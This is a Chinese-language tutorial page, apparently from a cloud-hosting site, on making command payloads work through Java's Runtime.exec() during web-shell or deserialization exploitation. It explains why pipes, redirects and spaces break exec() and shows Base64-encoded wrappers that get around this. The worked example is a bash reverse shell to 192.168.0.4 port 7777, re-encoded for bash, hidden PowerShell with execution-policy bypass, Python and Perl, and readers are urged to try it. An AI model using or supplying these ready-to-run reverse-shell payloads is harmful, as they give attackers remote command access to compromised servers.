您好,登錄后才能下訂單哦!
本篇內(nèi)容主要講解“java.lang.Runtime.exec() Payload命令怎么使用”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實(shí)用性強(qiáng)。下面就讓小編來帶大家學(xué)習(xí)“java.lang.Runtime.exec() Payload命令怎么使用”吧!
有時,通過Runtime.getRuntime().exec()執(zhí)行命令的有效負(fù)載有時會失敗。使用Web Shell,反序列化利用或通過其他媒介時,可能會發(fā)生這種情況。
有時這是因為重定向和管道字符的使用在啟動過程的上下文中沒有意義。例如,在shell中執(zhí)行l(wèi)s> dir_listing會將當(dāng)前目錄的列表輸出到名為dir_listing的文件中。但是在exec()函數(shù)的上下文中,該命令將被解釋為獲取>和dir_listing目錄的列表。
有時,StringTokenizer類會破壞其中包含空格的參數(shù),該類將命令字符串按空格分隔。像ls“我的目錄”之類的東西將被解釋為ls“我的目錄”。
借助Base64編碼,下面的轉(zhuǎn)換器可以幫助減少這些問題。它可以通過調(diào)用Bash或PowerShell來制作管道并重新定向,還可以確保參數(shù)內(nèi)沒有空格。
樣例:
原文
bash -i >& /dev/tcp/192.168.0.4/7777 0>&1
編碼后:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i} #bash powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YgBhAHMAaAAgAC0AaQAgAD4AJgAgAC8AZABlAHYALwB0AGMAcAAvADEAOQAyAC4AMQA2ADgALgAwAC4ANAAvADcANwA3ADcAIAAwAD4AJgAxAA== #powershell python -c exec('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='.decode('base64')) #python perl -MMIME::Base64 -e eval(decode_base64('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=')) #perl
中間的字符均為“base64”編碼。
到此,相信大家對“java.lang.Runtime.exec() Payload命令怎么使用”有了更深的了解,不妨來實(shí)際操作一番吧!這里是億速云網(wǎng)站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。